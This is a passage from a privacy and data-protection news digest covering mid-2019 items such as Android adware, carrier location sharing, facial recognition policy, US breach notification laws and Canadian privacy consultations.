WW – Google Apps Found to Contain Insidious Adware

Adware found in nearly 240 Android apps in the Google Play store delivers out-of-app ads, displaying them on devices’ lock screens and launching audio and video advertisements even when a device is asleep. The problematic apps are all from a single publisher, and the adware was well-hidden within each. The affected apps have been either removed from the Google Play store or updated to clean versions. [arstechnica.com​: 238 Google Play apps with >440 million installs made phones nearly unusable | www.darkreading.com: Adware Hidden in Android Apps Downloaded More Than 440 Million Times]

Telecom / TV

US – Groups Claim Unlawful Location Sharing By Phone Carriers

Public interest groups have filed a complaint to the U.S. Federal Communications Commission alleging that wireless carriers broke privacy laws while sharing customer location data without consent. Wireless providers AT&T, Verizon, Sprint and T-Mobile told the FCC last month that they had ended their third-party sharing. “The wireless carriers have been engaging in serious violations of their customers’ privacy. But the law is clear on this issue: wireless carriers need consent from their customers before they can disclose customer location data to third parties,” New America’s Open Technology Institute Senior Counsel Eric Null said in a statement. “The carriers’ practices have been public for over a year now, and the FCC has been asleep at the wheel. The wireless carriers have violated the law, it’s time to hold them accountable.” [The Hill]

US – FTC Clamping Down on Illegal Robocalls

The U.S. Federal Trade Commission and its law enforcement partners have announced the launch of “Operation Call it Quits,” which sets out to address the growing issue of illegal robocalls. The joint venture has already rolled out 94 actions against operations involving the fake, pre-recorded nuisance calls and telemarketing scams. The total number of FTC actions against robocallers and Do Not Call violators stands at 145. “We’re all fed up with the tens of billions of illegal robocalls we get every year,” FTC Bureau of Consumer Protection Director Andrew Smith said. “Today’s joint effort shows that combatting this scourge remains a top priority for law enforcement agencies around the nation.” [FTC.gov]

US Government Programs

US – PCLOB: Oversight Bodies Need to Keep Up With Government’s Data-Gathering Capabilities

In an op-ed for, U.S. Privacy and Civil Liberties Oversight Board Chairman Adam Klein and board members Edward Felten and Jane Nitze write about how legislators and oversight bodies need to keep up with the government’s increased ability to gather information. “The glut of data produced by a digitized society will require legislators and oversight bodies to re-think, or at least supplement, the law’s traditional focus on limits to the government’s ability to acquire information,” the PCLOB members write. “Legislators and oversight entities … must take stock of the full life cycle of data gathered by the government, examine how agencies use the data they have in addition to confirming that it was lawfully acquired.” [The Hill]

US – Senate Report Criticizes Federal Agencies’ Data Protection Track Record

A report published by the U.S. Senate Committee on Homeland Security and Governmental Affairs shows several government agencies have not effectively protected the personal data of U.S. citizens over the last decade. The report reveals the findings of a review of inspector general reports from the last 10 years at the Departments of Homeland Security, State, Transportation, Housing and Urban Development, Agriculture, Health and Human Services, Education and the Social Security Administration. In a statement, Senate Homeland Security Committee’s Subcommittee on Investigations Chairman Rob Portman, R-Ohio, said, “The federal government can and must do a better job of shoring up our defenses against the rising cybersecurity threats.” [ABC News]

US – Calif. Approves Audit of License Plate Reader Use by Law Enforcement

A California legislative committee approved a sweeping inquiry into law enforcement’s use of license plate readers. The Electronic Frontier Foundation and American Civil Liberties Union initiated the audit request after investigations uncovered security flaws with law enforcement cameras. Democratic State Sen. Scott Wiener said the audit is not intended to ban the technology but to investigate reports that license plate data is being given to U.S. Immigration and Customs Enforcement officials. In a public records request, the ACLU found ICE has access to license plate data maintained by Vigilant Solutions. The audit will focus on five agencies in Los Angeles, Sacramento and Fresno and is expected to be completed within seven months. [Courthouse News Service]

US Legislation

US – Nine States Pass New And Expanded Data Breach Notification Laws

In the absence of federal action, states have been actively passing new and expanded requirements for privacy and cybersecurity (see some examples here and here). While laws like the California Consumer Privacy Act (CCPA) are getting all the attention, many states are actively amending their breach notification laws. Illinois, Maine, Maryland, Massachusetts, New Jersey, New York, Oregon, Texas, and Washington have all amended their breach notification laws to either expand their definitions of personal information, or to include new reporting requirements. This blog post provides an informative roundup commentary on these recent state law changes:

  1. Illinois (SB 1624) – Illinois proposes notification requirements to the Attorney General;
  2. Maine (LD 946) – Maine places new restrictions on internet service providers (ISPs);
  3. Maryland (HB 1154) – Maryland imposes new requirements on entities following a security breach;
  4. Massachusetts (HB 4806) – Massachusetts expands data breach notification obligations;
  5. New Jersey (S. 52) – New Jersey expands the definition of personal information and modifies notification standards;
  6. New York (SB5575B)- New York expands the scope of protection under the law and establishes standards for businesses to protect consumer information;
  7. Oregon (SB 684) – Oregon expands the scope of protected data and notification requirements for vendors:
  8. Texas (HB 4390) – Texas adds definitive notification timeline and establishes an advisory council; and
  9. Washington (HB 1071) – Washington expands the definition of personal information and sets new notification requirements. [Data Protection Report (Norton Rose Fulbright)]

US – Legislation Seeks to Regulate Privacy and Security of Wearables and Genetic Testing Kits

On June 14, Senators Amy Klobuchar [D-MN] and Lisa Murkowski [R-AK] introduced the Protecting Personal Health Data Act [see PR & Bill S.1842], which would provide new privacy and security rules from the Department of Health and Human Services (HHS) for technologies that collect personal health data, such as wearable fitness trackers, social-media sites focused on health data or conditions, and direct-to-consumer genetic testing services, among other technologies. It would direct the HHS Secretary to issue regulations relating to the privacy and security of health-related consumer devices, services, applications, and software regulations will also cover a new category of personal health data that is otherwise not protected health information under HIPAA. The bill is particularly notable for three reasons:

  1. it would incorporate consumer rights concepts from the EU General Data Protection Regulation (GDPR), such as an individual’s right to delete and amend her health data, as well as a right to access a copy of personal health data, at the U.S. federal level;
  2. it does not contemplate situations where entities are required to retain personal health data under other regulations (though the bill includes an exception for entities covered under the Health Insurance Portability and Accountability Act); and
  3. it requires that HHS establish a national health task force to provide reports to Congress. It also specifies that any other federal agency guidance or published resources to help protect personal health data must be consistent with HHS Secretary’s rules under this bill this may reflect an expansion of HHS’s authority to set rules and standards for health data previously regulated by other federal agencies (such as the Federal Trade Commission (FTC). The bill would require HHS, in consultation with the FTC and other relevant stakeholders, to promulgate regulations that “strengthen privacy and security protections for consumers’ personal health data” collected, processed, analyzed, or used by health-related consumer devices, services, applications, and software. A companion bill has not yet been introduced in the House of Representatives. California is also considering a bill that would expand California’s health privacy law to include any information in possession of or derived from a digital health feedback system, which is broadly defined to include sensors, devices, and internet platforms connected to those sensors or devices that receive information about an individual [see AB-384: Information privacy: digital health feedback systems here] [Inside Privacy (Covington) | Klobuchar, Murkowski Introduce Bill to Protect Consumer Health Data Privacy | Klobuchar, Murkowski introduce legislation to protect consumer health data]

US – Sen. Markey: COPPA in Need of Update, Increased Age Requirement

The Wall Street Journal reports on the origins of the Children’s Online Privacy Protection Act, which the original architect, U.S. Sen. Ed Markey, D-Mass., believes needs to have its minimum age requirement raised. Markey, who helped send COPPA into force in 1998, sought to have websites require parental consent for users ages 16 and younger before lawmakers settled on under age 13. “It was too young and I knew it was too young then,” Markey said. “It was the best I could do.” Markey and Sen. Josh Hawley, R-Mo., introduced “COPPA 2.0” in March, calling for the age requirement to be bumped to age 16. Common Sense Media Founder and CEO Jim Steyer said COPPA is “hopelessly outdated” and that overhauling the law will be a tough sell considering societal norms and data value related to kids on the internet. [WSJ.com]

Workplace Privacy

EU – CNIL Fines Company 20K Euros for Illicit Employee Surveillance

France’s data protection authority, the CNIL, fined Uniontrad Company 20,000 euros for the video surveillance systems it set up to monitor its employees. Staff members filed complaints with the CNIL between 2013 and 2017 over the filming. The CNIL conducted an investigation in February 2018, when it found the cameras not only recorded employees’ activities continuously, but staff members were also never told exactly what was chronicled. The CNIL ordered Uniontrad to change its practices; however, a second audit in October 2018 found the company had not taken any action for the violations. Uniontrad has a two-month period to remedy its surveillance practices or face a 200 euro fine for each day it remains in noncompliance. [CNIL.fr]

+++

1-15 June 2019

Biometrics

US – Federal Law Trumps State Biometric Privacy Law; BIPA Appeal Thrown Out

On June 13, The U.S. Seventh Circuit Court of Appeals ruled [read ruling summary & 13 pg PDF ruling] that airlines are exempt from Illinois’ Biometric Information Privacy Act [BIPA] which requiring explicit informed consent from employees to use their biometrics for time and attendance systems, as it is outranked by federal law governing airline labor relations. Plaintiffs in the case sought a class action against Southwest Airlines, which was previously thrown out at the District Court level. In the unanimous opinion of the three-court appeals bench, the union holds status as a legally authorized representative for airline workers, which federal law grants to the union. State law cannot remove biometric collection consent from the union’s agreement with the airline, and BIPA does not attempt to do so, according to the ruling. “That biometric information concerns workers’ privacy does not distinguish it from many other subjects, such as drug testing that are routinely covered by collective bargaining and on which unions give consent on behalf of the whole bargaining unit,” Judge Frank Easterbrook wrote. Easterbrook also noted that the collective bargaining agreement between the union and the airline could include a BIPA violation, but that would be a matter for the dispute mechanisms outlined in the agreement. Southwest will presumably use the same defense in a separate BIPA lawsuit brought against it in August of 2018 [read coverage]. [Biometric Companies | Appeals panel: Federal law trumps state privacy law in class actions vs airlines over fingerprint scans ]

US – Group Launches Protest Against Airlines Using Facial Recognition

Privacy activists initiated a campaign calling out airlines that use facial-recognition technology to scan passengers in coordination with U.S. Customs and Border Protection. The group, Fight for the Future, hopes to encourage passengers to fly on airlines that do not use the technology. Despite assurances the program is only used to identify non-U.S. citizens who have overstayed their visas, the group is concerned the lack of federal regulations may lead to overreach. Currently, U.S. citizens can opt-out of the program, although few do so according to the airlines. The campaign comes just days after the CBP said the technology is not a surveillance program. [The Hill]

US – Calif. Senate Dems Vote to Ban Facial-Recognition Tech in Body Cameras

California Senate Democrats voted to ban the use of facial-recognition technology in body cameras used by law enforcement. The bill cleared the state Assembly last month and will see a final vote in the state Senate in the summer. Assembly Bill 1215 passed without any Republican votes in the Assembly before being passed through the state Senate committee. “What we don’t want is for communities to feel like they’re under surveillance 24 hours, 7 days a week when the officers’ body cameras are being worn,” said Assemblyman Phil Ting, D-Calif., who authored the bill. Meanwhile, the Financial Times reports on technology created to track eye movement. [Courthouse News Service]

US – Microsoft Quietly Deletes Largest Public Face Recognition Data Set

Microsoft has removed from the internet its MS Celeb, which was the largest public facial-recognition database in the world with 10 million images of 100,000 people. The photos within the database were used without the consent of subjects after being picked up online from search engines and videos under the terms of the Creative Commons license that allows photos to be recycled for academic purposes. “The site was intended for academic purposes. It was run by an employee that is no longer with Microsoft and has since been removed,” Microsoft said. Additionally, similar databases at Stanford and Duke universities were also pulled offline. [Financial Times | Microsoft Deleted a Massive Facial Recognition Database, But It’s Not Dead | Microsoft discreetly wiped its massive facial recognition database | Microsoft Quietly Pulls Its Database of 100,000 Faces Used By Chinese Surveillance Companies]

US – Civil Liberties Groups Sound Alarm on Face Surveillance Body Cameras

The ACLU of California and a diverse coalition of civil rights, racial justice, and digital privacy organizations sent a joint letter urging the California Senate Public Safety Committee to support AB 1215: The Body Camera Accountability Act [read ACLU fact sheet]. The law aims to prevents California law enforcement from adding real-time facial recognition technology to officer-worn body cameras for use against the public. The Senate Public Safety Committee is scheduled to vote on AB 1215 on June 11th [agenda]. Facial recognition technology suffers from serious accuracy and bias issues, according to multiple studies, and has been repeatedly demonstrated to misidentify women, young people, and people of color. Last year, the ACLU ran photos of members of Congress through Amazon’s “Rekognition” face surveillance product, and found that 28 members of Congress incorrectly “hit” with mugshot booking photos of arrestees [read blog post] – including former California legislators Mark DeSaulnier, Steve Knight, Jimmy Gomez, and Norma Torres. A disproportionate number of these false matches were lawmakers of color. The bill recognizes that even completely accurate facial recognition would subject the public to unprecedented tracking and further undermine the purpose of body cameras: to monitor officer conduct, not to track the identity and movements of Californians. Californians strongly support the policies in AB 1215, according to a poll of likely 2020 California voters. 82% of Californians believe the government shouldn’t be able to monitor and track who we are and where we go using our biometric information. 63% oppose adding biometric surveillance to public video cameras to identify and track the public. 62% believe that body cameras should be a tool for public oversight and accountability of police, not for surveillance of the public. Oregon and New Hampshire already prohibit the use of face recognition with body cameras. The San Francisco Board of Supervisors has voted to prevent the use of face recognition technology by city departments. Oakland and Berkeley are considering similar legislation. Legislators in Massachusetts, Michigan, and Washington have all introduced legislation putting some form of a halt on the government’s use of these systems. If approved by the Senate Public Safety Committee, AB 1215 would then head to the Senate Floor for approval. [ACLU of Northern California | California Considering a Ban on Realtime Police Body Camera Facial Recognition | California considers ban on facial recognition’s new frontier: police body cameras]

US – Amazon Joins Call for Regulation of Facial-Recognition Tech in US

Amazon Web Services CEO Andy Jassy said that his company supports and desires federal regulation on the misuse of facial-recognition software. Amazon joins fellow tech companies, including Microsoft and Google, that are calling for more policing of the tech. “Whether it’s private-sector companies or our police forces, you have to be accountable for your actions and you have to be held responsible if you misuse it,” Jassy said. “I think the issue around facial-recognition technology is a real one.” Amazon has received criticism for its facial-recognition software, Rekognition, but Jassy said his company wants to ensure the tech is being used lawfully at all times. Efforts by the U.S. Congress to limit or ban facial-recognition software are ongoing. According to Government Technology, U.S. Sen. Ed Markey, D-Mass., is calling on the Department of Homeland Security to stop using the facial-recognition software. [The Seattle Times]

US – NY Bill Would Postpone Facial Recognition in Schools

A bill banning the use of facial-recognition technology in New York schools for a year has advanced to the state Assembly’s Standing Committee on Ways and Means. Legislators believe the state’s Department of Education should study the technology more closely before implementing it in schools. “This issue needs to be explored further as we seek to balance safety and privacy of our schoolchildren, especially in respect to these new and emerging technologies to avoid issues of bias and serious concerns regarding data storage,” Gov. Andrew Cuomo’s, D-N.Y., spokesman Don Kaplan said in a statement. This comes on the heels of New York’s Lockport City School District announcing the use of facial-recognition technology in schools beginning in September. [Government Technology]

CN – Increased Use of Facial Recognition in China Poses Privacy Risks

China is enjoying the benefits and simplification brought forth by the growing use of facial-recognition technology, but such booming growth also comes with privacy concerns. As the technology evolves, it is becoming more invasive and collecting more data, leading Chinese legal analysts to believe improved legislation is necessary to regulate the growth. Acting on regulation now could be crucial as further expansion of facial-recognition tech is on the horizon. Shenzhen-based Qianzhan Industry Research Institute has done studies that predict the market for facial recognition in China will grow 20% over the next five years and have 10 billion yuan committed to the tech by 2024. [The Straits Times]

AU – Facial-Recognition Tech at Queensland Stadiums Sparks Privacy Concerns

Stadiums Queensland, owner of nine sporting and entertainment venues in the Australian state, has subtly begun trials of facial-recognition technology at its locations. An SQ spokeswoman said the software is in place “to identify patterns and anomalies in crowd behaviour such as abandoned bags or long queues.” The quiet installation of the technology has drawn the attention of Queensland Privacy Commissioner Philip Green, who said the public deserves more information about SQ’s implementation and that privacy impact assessments are necessary. “It’s simply good practice to identify risks of conducting this sort of surveillance and using facial recognition — those risks are being identified worldwide at the moment,” Green said. “It’s been demonstrated that bias can creep in, depending on what databases you’re using and who’s in the database, and the algorithms themselves.” [ABC News]

Big Data | Data Analytics | Artificial Intelligence

US – Government Agencies Roll Out ‘Federal Data Strategy’

Four U.S. government agencies have collaborated on a draft of the “Federal Data Strategy Year-1 Action Plan,” which seeks to “align existing efforts and establish a firm basis of tools, processes, and capacities to leverage data as a strategic asset.” The Office of Management and Budget, Office of Science and Technology Policy, Department of Commerce and Small Business Administration were each involved in the plan’s crafting. The inaugural plan will implement the base of the Federal Data Strategy through 16 fundamental steps that work toward the preliminary goal of improving data management across government entities. The publishing agencies also set a July 5 deadline to submit feedback on the plan. [Data.Gov]

UK – ICO Releases Interim Report for AI Guidance Project

On June 3, 2019, the UK Information Commissioner’s Office (ICO), released an Interim Report on a collaboration project with The Alan Turing Institute called “Project ExplAIn“. The purpose of this project is to develop “practical guidance” for organizations on complying with UK data protection law when using artificial intelligence (AI) decision-making systems; in particular, to explain the impact AI decisions may have on individuals. It may be of particular relevance to organizations considering how to meet transparency obligations when deploying AI systems that make automated decisions that fall within the scope of Article 22 of the GDPR [ICO guidance]. It summarizes the results of recent engagements with public and industry stakeholders to obtain views on how best to explain AI decision-making, which in turn will inform the ICO’s development of guidance on this issue. The research was carried out by using a “citizen’s jury” method to find out public perception on the issues and holding roundtables with industry stakeholders represented by data scientists, researchers, Chief Data Officers, C-suite executives, Data Protection Officers, lawyers and consultants. Following the results of the research, the Interim Report provides three key findings:

1) the importance of context in providing the right type of explanations for AI;

2) the need for greater education and awareness of AI systems; and

3) the challenges of providing explanations (such as cost, commercial sensitivities, and lack of internal accountability within organizations).

The Interim Report provides a list of contextual factors that the research found may be relevant when considering the importance, purpose and explanations of AI decision-making [see p. 23]. In terms of next steps, the ICO plans to publish a first draft of its guidance over the summer, which will be subject to public consultation. Following the consultation, the ICO plans to publish the final guidance later in the autumn. The Interim Report concluded three possible implications for the development of the guidance:

1) there is no one-size-fits-all approach for explaining AI decisions;

2) the need for board-level buy-in on explaining AI decisions; and

3) the value in a standardized approach to internal accountability to help assign responsibility for explainable AI decision-systems. The Interim Report provides a taster of what’s to come by providing the current planned format and content for the guidance, which focuses on three key principles:

(i) transparency;

(ii) context; and

(iii) accountability.

It will also provide guidance on organizational controls (such as roles, policies, procedures, and documentation), technical controls (such as on data collection, model selection and explanation extraction), and on delivery of explanations. The ICO will also finalize its AI Auditing Framework in 2020, which will also address the data protection risks arising from AI systems. [Inside Privacy (Covington) | AI Auditing Framework Blogspot]

EU – New Study Probes Rules on Automated Decision Making

The Privacy and Data Protection Journal has published an article by Duc Tran, Senior Associate from our Digital TMT, Sourcing & Data Team, exploring automated decision making under the General Data Protection Regulation read “Probing the rules on automated decision making“. Some organisations have sought to automate and optimise their operations and decision making processes using new technologies such as AI and machine learning. However, whilst the efficiency gains and other benefits may be considerable, it is important for these organisations to be aware of the legal implications of using such technology. One of these considerations is the GDPR restriction on the use of machines and automated systems to make decisions about individuals. GDPR Article 22 seeks to protect individuals from having important decisions (those with a legal or ‘similarly significant effect’) made about them by solely automated means (“automated decision making”). Indeed, automated decision making is only permitted under Article 22 in certain, limited situations. However, there is a significant amount of ambiguity surrounding the application of the rules on automated decision making, including in relation to when a given process will amount to automated decision making for the purposes of Article 22. The article explores this ambiguity, applying the following issues to real-world decision making processes:

1) The meaning of ‘similarly significant effect’;

2) When a decision is deemed ‘solely automated’; and

3) The level of human intervention required to take a decision outside the scope of Article 22, and whether this human intervention can take place at the ‘input’ or ‘output’ stage of a given decision making process.

Further guidance on automated decision making is available on the UK ICO’s AI Framework blog [read here]. Data Notes (Herbert Smith Freehills) | ICO’s Interim Report on Explaining AI | ICO blogs on meaningfulness of human involvement in AI systems ]

WW – Using Big Data to Fight Human Trafficking

Working with the Polaris Project, Enigma is trying to combat human trafficking through the Stand Together Against Trafficking project. Enigma Co-Founder and CEO Hicham Oudghiri discussed the efforts during a recent conference in New York City. According to a Forbes article from earlier this year, “To date, Enigma has synthesized 100,000 data sets in more than 100 countries, organized intelligence on 30 million small businesses and accumulated 140 billion points of data on the U.S. population.” In the interview, Oudghiri discusses how they use that data, including for sharing it to prevent human trafficking. The program is currently running with a list of restricted set of partners while Enigma fine-tunes the parameters of the project, the report states. [PC Magazine]

US – NY Poised to Pass First Bill Governing Use of Artificial Intelligence

New York is preparing to pass its first law to govern artificial intelligence in robots through a commission. The proposed bill stems from the need to regulate laws to catch up with the use of automation in the modern workforce. If passed, the commission would include various stakeholders in AI. It would evaluate the impact of AI in eliminating jobs statewide and the need to protect confidential information, as well as consider “potential restrictions … [and] criminal and civil liability regarding violations of law caused by entities with artificial intelligence, robotics and automation,” according to the bill. [GovTech]

US – FPF Launches Group to Support, Study Privacy-Protective Data Sharing

The Future of Privacy Forum has announced the creation of the Corporate-Academic Data Stewardship Research Alliance, a peer-to-peer network of private companies that seeks to ease privacy-protective data sharing between businesses and academic researchers. More than 25 companies have already joined the new initiative, which will strive to support and promote data sharing for academic research while addressing issues of ethics, policy and law in regards to sharing. While working under the common theme of understanding the legalities of data sharing, the alliance has already identified lacking contractual uniformity and limited access to an ethics review board as issues plaguing companies’ efforts to share data properly. [FPF.org]

CA – Dr. Ann Cavoukian Lends Privacy Expertise to D-ID Advisory Board

Privacy by Design framework creator Dr. Ann Cavoukian has joined D-ID’s [here & PR here] advisory board to share her privacy expertise, the biometric facial recognition-blocking company has announced. Cavoukian is a three-term Privacy Commissioner for the Canadian province of Ontario, and is currently the Executive Director of the Global Privacy & Security by Design Centre. “We are thrilled and honored to welcome Ann to our Advisory Board,” comments D-ID Co-founder and CEO Gill Perry. “Her rich experience and deep understanding of privacy regulation will be a huge asset for us as we continue to advance our revolutionary facial-recognition blocking platform.” “Our face is among the most sensitive biometrics in existence,” says Cavoukian. “If a facial image is obtained without consent, it can easily be compromised, resulting in devastating occurrences such as identity theft. Technologies such as D-ID’s can greatly protect facial images and take individuals and organizations out of harm’s way.” Cavoukian recently criticized Toronto Police for a lack of transparency in their use of facial recognition [read CBC coverage here]. D-ID won a 2019 Netexplo award in April, and is also presenting its deep-learning facial image shielding technology at Identity Week 2019 in London. [Biometric Update]

Canada

CA – OPC Consultation on Transfers for Processing Resumes

On June 11, the Office of the Privacy Commissioner of Canada (OPC) announced that it is resuming its Consultation on transfers for processing with a Reframed Discussion Document that consolidates and supersedes the OPC’s original Consultation document of April 9, 2019 and its Supplementary Discussion Document of April 23rd, 2019. The new “stand-alone” paper reframes the consultation to invite stakeholder views on not only how the current law should be interpreted, but also how a future law should provide effective privacy protection in the context of transfers for processing in light of the recent adoption of Canada’s Digital Charter, and the Federal Government’s proposals for amending PIPEDA (Strengthening Privacy for the Digital Age). In addition to the original questions posed in the Supplementary Discussion Document of April 23rd — which remain the same — the OPC is also inviting submissions on these three more “future-oriented” questions:

  • How should a future law effectively protect privacy in the context of transborder data flows and transfers for processing?;
  • Is it sufficient to rely on contractual or other means, developed by organizations and reviewed only upon complaint to the OPC, to provide a comparable level of protection? Or should a future law require demonstrable accountability and give a public authority, such as the OPC, additional powers to approve standard contractual clauses before they are implemented and, once they are adopted, proactively review their implementation to ensure a comparable level of protection?; and
  • How should a future law effectively protect privacy where contractual measures are unable to provide that protection?

The new deadline for submissions on the Reframed Discussion Document on Transfers for Processing is now August 6, 2019. AccessPrivacy will be discussing this most recent development in greater detail during its next Monthly Call on June 19th, 2019 at 11:30 a.m. EDT. [details] [AccessPrivacy (Osler) | Consultation on transfers for processing – Reframed discussion document | Privacy commissioner suspends consultation following Equifax data breach, say lawyers | Is Data Residency Coming to Canada? The OPC Signals a Major Change to its Policy Position on Transborder Dataflows (4 pg PDF) | Canada’s Privacy Commissioner Recommends Consent for Cross Border Data Transfers | The battle over data localization | The many lessons of the Equifax data breach | Rewriting Canadian privacy law: Commissioner signals major change on cross-border data transfers | Do Cross-Border Data Transfers From Canada Require Consent? | Privacy Commissioner Proposes a Consent Requirement for Transborder Data Flows | OPC Proposes a Reversal in its Approach to Transfers of Personal Information to Service Providers for Processing]

CA – CBSA Investigates After Licence Plate Reader Linked to U.S. Hack

Photos of travellers and licence plates collected by U.S. Customs and Border Protection [CBP] were compromised in a privacy breach last month [read W.P. coverage]. The Canada Border Services Agency [CBSA] and CBP use the same plate reader technology. CBP said they learned of the data breach, which affected fewer than 100,000 people, at the end of May. A subcontractor transferred copies of images to its company network without the agency’s authorization, violating U.S. government policy, said the American officials. Now the CBSA has launched its own investigation. “We are currently reviewing and assessing what impacts, if any, this breach has on our operations and Canadians. While the CBSA awaits the completion of the forensic investigation, our information at this time is that this incident does not pose systems or security vulnerabilities” said CBSA spokesman Nicholas Dorion in an email to CBC. The office of federal privacy commissioner said it’s reaching out to the CBSA for more information. Public Safety Minister Ralph Goodale, whose portfolio includes the border agency, said he’s concerned about the breach: “(CBSA is) investigating that whole situation from top to bottom. To this point, there have not been serious implications for CBSA’s information, but obviously CBSA is concerned about the quality of the services that are provided to it and they are investigating all the ramifications.” [CBC News | US Customs and Border Protection says traveler images were taken in cyberattack | CBP says photos of U.S. travelers, license plate images were stolen in data breach | CBP says traveler photos and license plate images stolen in data breach

CA – Canada’s Military Spies Can Collect, Share Info on Canadians: Directive

The Canadian Press recently obtained a copy of the eight-page, August 2018 directive, “Guidance on the Collection of Canadian Citizen Information,” through the Access to Information Act. It says Canada’s military spies can collect and share information about Canadian citizens — including material gathered by chance. The instruction to National Defence employees and members of the Canadian Forces says any information collected about Canadians must have a “direct and immediate relationship” to a military operation or activity. The guidance also says data about Canadians, whether it’s collected intentionally or not such as that scooped up inadvertently from open sources like social-media feeds may be kept and used to support authorized defence-intelligence operations, the directive says. The prospect of defence-intelligence agents having personal data about Canadians worries civil-liberties advocates, because it is unclear just how much could be collected incidentally from the vast reaches of cyberspace. The national-security and intelligence committee of parliamentarians is examining the directive as part of a study on how National Defence and the Canadian Forces gather, use, keep and share information about Canadians as part of their intelligence work. It plans to deliver a special report to the prime minister on the subject this year. It will be a follow-up to an April report from the committee that said the military has one of the largest intelligence programs in Canada, and it gets little outside scrutiny. It said these activities involve considerable risks, including infringements of Canadians’ rights. The committee called for stricter controls on the military’s spying, including the possibility of legislation spelling out when and how defence intelligence operations can take place. [CBC News | The Canadian Military Is Actually Allowed Take And Share Information From Your Phone]

CA – Directive Allows Canadian Surveillance Agencies to Gather Citizen Data for Legitimate Investigations

An August 2018 federal directive states Canadian surveillance agencies can collect and share citizens’ data as part of legitimate investigations. The “Guidance on the Collection of Canadian Citizen Information” directive states any information gathered on Canadian citizens must have a “direct and immediate relationship” to an investigation; however, “emerging technologies and capabilities” could result in inadvertent data collection. The National Security and Intelligence Committee of Parliamentarians plans to send a special report on the directive to the prime minister this year. Meanwhile, a Mountie from British Columbia violated provincial law when he investigated the background of a protestor and leaked his findings to municipal officials. [The Canadian Press]

CA – OIPC NS Releases 2018-2019 Annual Report

On June 5, Catherine Tully, Nova Scotia’s Information and Privacy Commissioner, released her annual report for 2018-2019. This year marks the 25th anniversary of the Office of the Information and Privacy Commissioner. With the rapid development of technology and its capacity to process enormous volumes of information, particularly personal information, a watchdog for access to information and privacy rights has never been more necessary. Over the last 25 years, the Office of the Information and Privacy Commissioner has become a trusted voice in Nova Scotia. More than a thousand citizens call us each year with concerns about their access and privacy rights. Hundreds of public bodies, municipalities and health custodians seek our advice, recommendations and guidance on the complex access and privacy issues that arise in the digital age. And, thousands of Nova Scotians attend OIPC-led presentations on issues ranging from big data to privacy breach management to open government. Nova Scotians, through their desire for transparency, accountability and knowledge, have helped transform this office from a small, yet important, operation which dealt almost exclusively with access to information appeals to an influential, dynamic and proactive democratic institution. When the first Commissioner was appointed 25 years ago, clouds were only in the sky, cities were dumb and discs were floppy. Today, the office handles complex files reflective of the opportunities and challenges of our modern world. We provide advice on issues ranging from the privacy risks of facial recognition, cloud storage and smart cities to managing the accountability obstacles inherent in modern data communication and storage technology. The 2018-2019 Annual Report includes details of the extraordinary increase in the caseload of the office and the challenges we face with very limited resources. The Service Plan, included with the report, highlights a number of concerning trends in Nova Scotia. Commissioner Tully concludes by noting, “The future of access and privacy rights in Nova Scotia depends on us keeping pace with technology and ensuring that our rights are subject to meaningful and effective oversight. It will take courage and determination on the part of politicians and likely a push from the public to bring our access and privacy laws into the 21stcentury.” [ Office of the Information and Privacy Commissioner | Nova Scotia only ‘fully accepted’ 40 per cent of information czar’s findings last year: report | Nova Scotia information and privacy watchdog cites concerning trends in government performance | At least 865 privacy breaches of Nova Scotia medical records in past year: watchdog | Swamped information commissioner again chides McNeil government | Federal politicians could soon face B.C. privacy watchdog over party databases]

CA – Privacy Expert Ann Cavoukian: Federal ‘Digital Charter’ Is Pre-Election Posturing

Former Ontario privacy commissioner Ann Cavoukian said she’s in favour of the federal government’s recently announced “digital charter” [read PR, overview & minister’s message] but thinks it should have been brought out long ago; arguing that, if the government was serious about protecting Canadian privacy and digital rights, it would have acted last year or the year before. “It’s talk. It’s for show. And that’s what upsets me, because the government had a real chance of making this a reality and they chose not to do that,” Cavoukian said. “That’s what I object to, not the contents of the digital charter. If this was real, it would have been done last year or the year before.” Cavoukian was commenting at the annual Canadian Telecom Summit in Mississauga, Ont. Innovation Minister Navdeep Bains, who responsible for the digital charter as well as telecommunications, will speak at the same conference on Wednesday. A member of the Bains’ staff said by phone that the minister understands Cavoukian’s position but feels the government updated one of Canada’s privacy laws last year and plans to do more in future. [The Toronto Star | Canada’s Digital Charter does not comfort Alphabet’s smart-city critics | Opinion: Politicians say they care about privacy. So why can political parties ignore privacy law? | Five reasons Canada’s Digital Charter will be a bust before it even gets going | FUREY FACTOR Downloading Trudeau’s digital charter – is it too vague? (video) | KINSELLA: Trudeau needs to practice what he preaches | Give Canadians privacy rights in new law, says federal privacy commissioner  | Canada’s Digital Charter: How to give it teeth | Canada’s digital charter represents a sea change in privacy law, but several unaddressed issues remain | Minister Bains announces Canada’s Digital Charter | Canada announces Digital Charter, promises serious fines to business for not protecting privacy  | Trudeau government unveils plans for digital overhaul | Ottawa launches data strategy, eyes fines tied to tech giants’ revenue Subscriber content]

CA – OPC Suspends Consultation Following Equifax Data Breach

In late May the Privacy Commissioner of Canada Daniel Therrien told lawyers and chief privacy officers that it would suspend its consultation on transborder dataflows, which was announced [see PR & details] on April 9 after an investigation into Equifax and Equifax Canada Co.’s compliance with PIPEDA. In his April 9 announcement the commissioner said: “An investigation into a global data breach has found that both Equifax Canada and its US-based parent company fell far short of their privacy obligations to Canadian” The OPC pledged, as a result, a formal consultation would be done on “soliciting feedback and updating its guidance on cross-border transfers of personal information. We believe individuals would generally expect to know whether and where their personal information may be transferred or otherwise disclosed to an organization outside Canada,” said the OPC. In 2009, the OPC had said that a “transfer” is not to be confused with a “disclosure” of personal information, because a transfer of information “can only be used for the purposes for which the information was originally collected” [read guidance] The OPC’s Equifax investigation reversed that, and said that “transfers for processing from Equifax Canada to Equifax Inc. constitute disclosures of personal information under the meaning of PIPEDA” [see here] The news caused widespread dismay, say lawyers. Halifax privacy lawyer David Fraser says the April 9 consultation announcement “came out of nowhere and it wasn’t just a consultation because in fact it was begun by them saying, ‘We are completing re-writing our approach to cross-border data flows and all outsourcing, to a 180 degree turn away from the guidance that my predecessor (former Privacy Commissioner of Canada Jennifer Stoddart) gave in 2009.and we’re completely reinterpreting our statutes in a way that the statute won’t bear, but please give us your comments.” his take was that “this consultation was ill-conceived from the get-go.” Fraser says the immediate reaction to the news was “overwhelmingly negative, even bringing into question Therrien’s respect for the rule of law and parliamentary supremacy.” “I think he was looking for a way to walk this back,” he says. “And I think the digital charter announcement [see PR & gov’t overview] and proposals for privacy law reform contained in that, gave him cover to do that.” Fraser says he was not present at the meetings in Toronto last week where the suspension of the consultation was announced, but says the privacy bar was abuzz with the news. David Elder, chair of the communications and privacy and data protection groups at Stikeman 